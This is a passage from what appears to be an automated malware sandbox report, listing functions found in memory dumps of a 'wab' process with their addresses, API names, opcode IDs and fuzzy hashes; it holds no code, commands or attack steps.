                                                                                    • Instruction Fuzzy Hash: E81103B59042498FCB11DF9AD585BDEFFF4AB48224F208459E518A7240D3B5A940CBA5
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 24C8BA41 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • OleInitialize.OLE32(00000000), ref: 24C8BA9D
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3629056563.0000000024C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 24C80000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_24c80000_wab.jbxd
                                                                                    Similarity
                                                                                    • API ID: Initialize
                                                                                    • String ID:
                                                                                    • API String ID: 2538663250-0
                                                                                    • Opcode ID: 3e70a17f3bca5db6c12723fc7316a6007a0ddaab67dab26541737b7ad30f6571
                                                                                    • Instruction ID: 68131ddd4c5e17a81336dbb32bf4131cbdd7908857a71c2b281bb92f5b83a90b
                                                                                    • Opcode Fuzzy Hash: 3e70a17f3bca5db6c12723fc7316a6007a0ddaab67dab26541737b7ad30f6571
                                                                                    • Instruction Fuzzy Hash: 221103B5D002498FDB10CFAAD585BCEBFF4EB48224F208419E518A7200D3B5A944CFA1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 24C89BC4 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,24C8B155), ref: 24C8B1DF
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3629056563.0000000024C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 24C80000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_24c80000_wab.jbxd
                                                                                    Similarity
                                                                                    • API ID: CallbackDispatcherUser
                                                                                    • String ID:
                                                                                    • API String ID: 2492992576-0
                                                                                    • Opcode ID: 738abb47bc34d4d0a21a45253cdf9025e1775af802f2490f2da3aa784db1cf8c
                                                                                    • Instruction ID: 6aa0391306383230569b016903be9eb9f6da83ed5cc490738d2202302dad3521
                                                                                    • Opcode Fuzzy Hash: 738abb47bc34d4d0a21a45253cdf9025e1775af802f2490f2da3aa784db1cf8c
                                                                                    • Instruction Fuzzy Hash: 2F1130B59042498FCB10CF9AD585BDEFBF4EF88724F20845AE518A7340D7B4A940CFA5
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 24C8B178 Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,24C8B155), ref: 24C8B1DF
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3629056563.0000000024C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 24C80000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_24c80000_wab.jbxd
                                                                                    Similarity
                                                                                    • API ID: CallbackDispatcherUser
                                                                                    • String ID:
                                                                                    • API String ID: 2492992576-0
                                                                                    • Opcode ID: 61afefaec3f7a6a9214946d7a4424a2d55ba4362403d9bbbd854ec97dea935af
                                                                                    • Instruction ID: 5ad4cbfba874af826c500c8bd7a432df39ca7887fa12e3613dbdce0876ce6fda
                                                                                    • Opcode Fuzzy Hash: 61afefaec3f7a6a9214946d7a4424a2d55ba4362403d9bbbd854ec97dea935af
                                                                                    • Instruction Fuzzy Hash: 1C1103B59002498FDB10CF9AD585BDEFBF4EF88724F208419D518A7340D7B8A940CFA5
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 24CA9188 Relevance: 1.4, Strings: 1, Instructions: 172COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3629153780.0000000024CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 24CA0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_24ca0000_wab.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: b_$
                                                                                    • API String ID: 0-366904666
                                                                                    • Opcode ID: d659f4fd0362784ece1db59225caa6416d9782386c19590e730ab4c748689321
                                                                                    • Instruction ID: c265350c91e34a96c967664796d8d535f561f5f36d4a812518a2577249c8e430
                                                                                    • Opcode Fuzzy Hash: d659f4fd0362784ece1db59225caa6416d9782386c19590e730ab4c748689321
                                                                                    • Instruction Fuzzy Hash: 3B514170B411569BDB55DB68D891BAEB7F3FBC9210F148D69C909EB388EB34DC018B90
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 24CA9198 Relevance: .2, Instructions: 231COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3629153780.0000000024CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 24CA0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_24ca0000_wab.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: cdc78ce6cb15305665ff6a44b1b99e41edfa41b56e6d02e9d6a2b5671a241451
                                                                                    • Instruction ID: 3f4db306fedf1affd2ddf7254a938b73027df95a8ea966ca72e6ac569fd2376b
                                                                                    • Opcode Fuzzy Hash: cdc78ce6cb15305665ff6a44b1b99e41edfa41b56e6d02e9d6a2b5671a241451
                                                                                    • Instruction Fuzzy Hash: 82914270B4025B8BDB55DF69C890BAEB7F3BFC5200F108969C909EB348EB749D418B91
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 24CA6228 Relevance: .2, Instructions: 229COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3629153780.0000000024CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 24CA0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_24ca0000_wab.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: c2dbc2f229748676f7f67cb2583d6ec6fc0d4a7705120fdca6d5aefcae425489
                                                                                    • Instruction ID: 6b8b256999764efe835398e4bb76898677bd6037cd91bbbde1f60bf3f19af647
                                                                                    • Opcode Fuzzy Hash: c2dbc2f229748676f7f67cb2583d6ec6fc0d4a7705120fdca6d5aefcae425489
                                                                                    • Instruction Fuzzy Hash: 0061F372F001624BCB05EA6DC88466FBAD7EFC4620B15447AE80EDB361DEB5ED0287C1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 24CA42D9 Relevance: .2, Instructions: 224COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3629153780.0000000024CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 24CA0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_24ca0000_wab.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 07bf45e219ff971c0678e97ae5ec3f699c53296a845fa6b29fe5edbe9ede85ea
                                                                                    • Instruction ID: 8bbe29689a3af8e95db7af8ccc23d23ca7cc57df3299284c1c165c093040f3d5
                                                                                    • Opcode Fuzzy Hash: 07bf45e219ff971c0678e97ae5ec3f699c53296a845fa6b29fe5edbe9ede85ea
                                                                                    • Instruction Fuzzy Hash: 53814F34B0125A8FDB45DFA9C49469EB7F3AFC9310F108929D80AEB385EB74DD428B51
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 24CA45F8 Relevance: .2, Instructions: 221COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3629153780.0000000024CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 24CA0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_24ca0000_wab.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 52bd090ff9d4392be2157b1b3fd905807ffe59439ca977e1c73e9cccb547f0c8
                                                                                    • Instruction ID: a3384e46500b078bd74a8b98ecfd658919daffa5580afc719ec49e1d0a8b020c
                                                                                    • Opcode Fuzzy Hash: 52bd090ff9d4392be2157b1b3fd905807ffe59439ca977e1c73e9cccb547f0c8
                                                                                    • Instruction Fuzzy Hash: 2B914D34E0065A8FDB11DF68C890B9DBBB2FF89310F208599D549EB251DB70AA85CF91
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 24CA42E8 Relevance: .2, Instructions: 218COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3629153780.0000000024CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 24CA0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_24ca0000_wab.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: ea89ad9dc8007dfe1fa44e5e94b902fa1471a7b509708677589732c4e38d1ff8
                                                                                    • Instruction ID: ccf87f286a0175b8e6749eb7f950378131e1effb025af5a8d8d7472eb33ed6a5
                                                                                    • Opcode Fuzzy Hash: ea89ad9dc8007dfe1fa44e5e94b902fa1471a7b509708677589732c4e38d1ff8
                                                                                    • Instruction Fuzzy Hash: 68812D30B0125A8BDB45DFA9C45479EB7F3AFC9300F108929D80AEB395EB74DD428B95
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 24CA4610 Relevance: .2, Instructions: 210COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3629153780.0000000024CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 24CA0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_24ca0000_wab.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 867b2853703414980a8e2b348ceb52db7dfb447f0fba3fbc7fb2c7fe28445540
                                                                                    • Instruction ID: c25baa66c52b6ce6023af7035006152f3759b575b16a389f5c33cbaa9350bc35
                                                                                    • Opcode Fuzzy Hash: 867b2853703414980a8e2b348ceb52db7dfb447f0fba3fbc7fb2c7fe28445540
                                                                                    • Instruction Fuzzy Hash: 2E912C34E0061A8BDB11DF68C890B9DB7B2FF89310F208599D549BB355DB70AA85CF91
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 24CAEB61 Relevance: .2, Instructions: 205COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3629153780.0000000024CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 24CA0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_24ca0000_wab.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: d2e1a25ac9e563a61b9e113dfaddcfa0db879c21e3ea91226be11cf940ab47ae
                                                                                    • Instruction ID: 5889ccec1cc74f58ccea5a823a2500fd5beeefc7ba74e51b99ac256dffa84a79
                                                                                    • Opcode Fuzzy Hash: d2e1a25ac9e563a61b9e113dfaddcfa0db879c21e3ea91226be11cf940ab47ae
                                                                                    • Instruction Fuzzy Hash: 9D713970A402599FDB05DFA8C984A9EBBF7FF88310F248429D445EB359DB34E946CB90
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 24CAEB70 Relevance: .2, Instructions: 201COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3629153780.0000000024CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 24CA0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_24ca0000_wab.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: e6607a19c4705aa1a7fe45fb8a431dd5ab915284b7193bfc106e9bae92d15dd5
                                                                                    • Instruction ID: 9820dd69a5b3064a670b36f61bd44f4096da9f797639ea42d53d678d0701e8fa
                                                                                    • Opcode Fuzzy Hash: e6607a19c4705aa1a7fe45fb8a431dd5ab915284b7193bfc106e9bae92d15dd5
                                                                                    • Instruction Fuzzy Hash: 6D713870A402599FDB05DFA8C984A9EBBF7FF88310F248429D445EB359DA70ED46CB90
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 24CA4BA8 Relevance: .2, Instructions: 186COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3629153780.0000000024CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 24CA0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_24ca0000_wab.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 5c94eee814779b90853c281ce51cff6ab94ed2aea3adf75a15305fbb375476fa
                                                                                    • Instruction ID: 01536890ad19fc1c08b21eb846843879be68cb1e6631a969983d9a9eb3d7caa9
                                                                                    • Opcode Fuzzy Hash: 5c94eee814779b90853c281ce51cff6ab94ed2aea3adf75a15305fbb375476fa
                                                                                    • Instruction Fuzzy Hash: 7A617F30F002199FEB159FA9C8547AEBBF7FB88310F20852AE509AB395DB754C458F94
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 24CAFCE0 Relevance: .2, Instructions: 171COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3629153780.0000000024CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 24CA0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_24ca0000_wab.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 3a960c99200694756585fe7c1c178fb16a799ea6bedf242e2309a7f2b3f36a76
                                                                                    • Instruction ID: 06143fd1585a619288764afbd7ae3d846a93c0abfe76dd70904f54521bc1a977
                                                                                    • Opcode Fuzzy Hash: 3a960c99200694756585fe7c1c178fb16a799ea6bedf242e2309a7f2b3f36a76
                                                                                    • Instruction Fuzzy Hash: D951BF32E0011ADFDB15EF78E49869DB7B3FB84315F108869E10AD7251DB358955CB80
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 24CAFA81 Relevance: .2, Instructions: 168COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3629153780.0000000024CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 24CA0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_24ca0000_wab.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: d7e83a8fc7f6446f306e0a1b26889d43fe219417057a7f08912753b84d59dbc6
                                                                                    • Instruction ID: 274f2ee819baabb3bcffe295188f787f3d058ca69c93c655a5e7b2bb2acdbf25
                                                                                    • Opcode Fuzzy Hash: d7e83a8fc7f6446f306e0a1b26889d43fe219417057a7f08912753b84d59dbc6
                                                                                    • Instruction Fuzzy Hash: 1C51C631B001568BFB265ABCC85475E7A6BD7C9310F20482AED0BD7397CD79CD458BA2
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 24CAFA90 Relevance: .2, Instructions: 163COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3629153780.0000000024CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 24CA0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_24ca0000_wab.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 052d83875fa5290cad38c84d344b2a61bc8ea9766482037221b307e35f0222b1
                                                                                    • Instruction ID: bd1e123a7c5df0cb4e380e181854fc66408abcfbc9b1a8e901d01b360e187463
                                                                                    • Opcode Fuzzy Hash: 052d83875fa5290cad38c84d344b2a61bc8ea9766482037221b307e35f0222b1
                                                                                    • Instruction Fuzzy Hash: B651A231B001668BEB265ABCC85475E7A5BE7C9310F20482AED0BD7397CD79CD418BA2
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 24CA4B98 Relevance: .1, Instructions: 144COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3629153780.0000000024CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 24CA0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_24ca0000_wab.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: d18a4ca04c2c018aa73924d216b6025f05c2bd479847173715b2003dad67d7bc
                                                                                    • Instruction ID: eef892c950346a8777e522dc1393163dbd50b31daca65a66c003b32cb86a8372
                                                                                    • Opcode Fuzzy Hash: d18a4ca04c2c018aa73924d216b6025f05c2bd479847173715b2003dad67d7bc
                                                                                    • Instruction Fuzzy Hash: 18517031F002599FDB05DFA9C454BAEBBB7FB88710F208529D549AB395DA748C018B91
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 24CA5460 Relevance: .1, Instructions: 126COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3629153780.0000000024CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 24CA0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_24ca0000_wab.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 396457b990854f87b8fd43b87b5673842b7b6dc689380b935b767045656d5c98
                                                                                    • Instruction ID: 5bdbb79dd7c687048166e5074cb8d41c773d7e57be1e2449d235e218919537db
                                                                                    • Opcode Fuzzy Hash: 396457b990854f87b8fd43b87b5673842b7b6dc689380b935b767045656d5c98
                                                                                    • Instruction Fuzzy Hash: 39415071E0061A9FDB21CE9DD8C0AAFFBF3FB84310F10892AE216D7651D630E9458B91
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 24CADB18 Relevance: .1, Instructions: 117COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3629153780.0000000024CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 24CA0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_24ca0000_wab.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 1572e305152934eb09707c946910d46e206e052ddc15c2bbe60d8b4eb2767841
                                                                                    • Instruction ID: 15a58648230969c818fb8415b708d916e806a18afb8a2ae8ee087e088950a29d
                                                                                    • Opcode Fuzzy Hash: 1572e305152934eb09707c946910d46e206e052ddc15c2bbe60d8b4eb2767841
                                                                                    • Instruction Fuzzy Hash: C6418F70E0026ADFDB15DF69C85469EBBB3FF85704F208929D505EB240DF749946CB90
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 24CAFCD1 Relevance: .1, Instructions: 116COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3629153780.0000000024CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 24CA0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_24ca0000_wab.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 3a705ef8ca16736ea6e681ea73dc50a540bb1cfbc3877342335e694ba4c57249
                                                                                    • Instruction ID: 832349b073d1360fb12912a2555ccda8fc2310144deb43f9f65154fe8fcb5b35
                                                                                    • Opcode Fuzzy Hash: 3a705ef8ca16736ea6e681ea73dc50a540bb1cfbc3877342335e694ba4c57249
                                                                                    • Instruction Fuzzy Hash: C031F032F00156CFDB0AAF78D4582AEB7B3EB85211F108979D04AEB345DF358916CB80
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 24CADB0B Relevance: .1, Instructions: 110COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3629153780.0000000024CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 24CA0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_24ca0000_wab.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 918d24b0e73fccdf0619127a67fae5094a902fb193e4045e18d5f73654b06566
                                                                                    • Instruction ID: a1cf77ec03fbc952a2e77a56afc91bf3ebf1d39d7df44f194585c68bc3f50efd
                                                                                    • Opcode Fuzzy Hash: 918d24b0e73fccdf0619127a67fae5094a902fb193e4045e18d5f73654b06566
                                                                                    • Instruction Fuzzy Hash: 27417C70E0026A9FDB15DF69D48069EBBB3FF85300F108929D905EB240EF74A956CB90
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 24CA21ED Relevance: .1, Instructions: 108COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3629153780.0000000024CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 24CA0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_24ca0000_wab.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: d9aad5611040c5ec497ff0eca1f2f28bd8c6a88ab98f3ecc149c1cf132edaff1
                                                                                    • Instruction ID: 5c1d6327457043ff47c174f1f06038c725a4e83d620a59d5c20bacc732f81849
                                                                                    • Opcode Fuzzy Hash: d9aad5611040c5ec497ff0eca1f2f28bd8c6a88ab98f3ecc149c1cf132edaff1
                                                                                    • Instruction Fuzzy Hash: DE31E530B402228FDB099F79C4546AE7BA3AF89724F20496DC406DF399DE39DD42CB91
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 24CA2200 Relevance: .1, Instructions: 105COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3629153780.0000000024CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 24CA0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_24ca0000_wab.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: e8e462e2b7596bb375e2996a6b26d51e95dc3d7c0fc90975a81227ecfd7c8c3d
                                                                                    • Instruction ID: 49ce59e006ca37ecb060831ef4a374ba983731176a027e52732dcfdbec01789d
                                                                                    • Opcode Fuzzy Hash: e8e462e2b7596bb375e2996a6b26d51e95dc3d7c0fc90975a81227ecfd7c8c3d
                                                                                    • Instruction Fuzzy Hash: 1A31B030B002268FDB09AF79C45466F7BA7AFC9714F204968C406DF399DE35DD428B91
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 24CAD9C8 Relevance: .1, Instructions: 93COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3629153780.0000000024CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 24CA0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_24ca0000_wab.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 51ba981dfc7f51318eab2dc2a5e370c4d74b09aa7607027824b6b20f4ace0357
                                                                                    • Instruction ID: 8cd723a33b36bcc38478381023a15163de0b32c523daabd91a323804ab7a95fa
                                                                                    • Opcode Fuzzy Hash: 51ba981dfc7f51318eab2dc2a5e370c4d74b09aa7607027824b6b20f4ace0357
                                                                                    • Instruction Fuzzy Hash: 2F315430A1461A9BDB15DF69C48068EBBB7FF85300F108929E805EB345DFB4E946CB81
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 24CAD9C3 Relevance: .1, Instructions: 91COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3629153780.0000000024CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 24CA0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_24ca0000_wab.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: d19b9f74008d32d9448d5f10ece9a21da71c4dd9883fa44d7e53132bb538e74f
                                                                                    • Instruction ID: 7fdfe25cf7a3badb0709c157bf6648010b3e90d637af66be9cc711ae97a1ee38
                                                                                    • Opcode Fuzzy Hash: d19b9f74008d32d9448d5f10ece9a21da71c4dd9883fa44d7e53132bb538e74f
                                                                                    • Instruction Fuzzy Hash: 8E315230A1461A8BDB15DF69C48068EBBB7FF84300F108929D905EB345EFB4E946CB81
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 24CA3AD9 Relevance: .1, Instructions: 82COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3629153780.0000000024CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 24CA0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_24ca0000_wab.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: e1dbb83213f46da2907d38c8bea81a873195dda1a58303fa8cb24983ef11c7b6
                                                                                    • Instruction ID: 43906efc2a6a82929b29eb8bd9207b8737b9e69572f1ad18e00e7e72e31cb3b2
                                                                                    • Opcode Fuzzy Hash: e1dbb83213f46da2907d38c8bea81a873195dda1a58303fa8cb24983ef11c7b6
                                                                                    • Instruction Fuzzy Hash: 312151B1F522199FDB00CFB9E841AEDBBF2EB48710F104466E909EB395E774D9058B90
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 24CA3AE8 Relevance: .1, Instructions: 78COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3629153780.0000000024CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 24CA0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_24ca0000_wab.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 849aa8efaa0547bae6a3f99b0c94cff6f113ecf7499dfe198ff6f77bba18f3ec
                                                                                    • Instruction ID: efca0f128fe34367282cc723b2e9a2dd643543484f09eaf6b0deaa4ee660e1e5
                                                                                    • Opcode Fuzzy Hash: 849aa8efaa0547bae6a3f99b0c94cff6f113ecf7499dfe198ff6f77bba18f3ec
                                                                                    • Instruction Fuzzy Hash: 15214F75F0121A9FDB00CF69D890AEEBBF2AB48710F10446AE909E7390E774DD408B94
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0279D007 Relevance: .1, Instructions: 77COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3593420237.000000000279D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0279D000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_279d000_wab.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 8f737f0f00a62ca7feb269012a5df5687131c87f6536780a005b969ec9db5a45
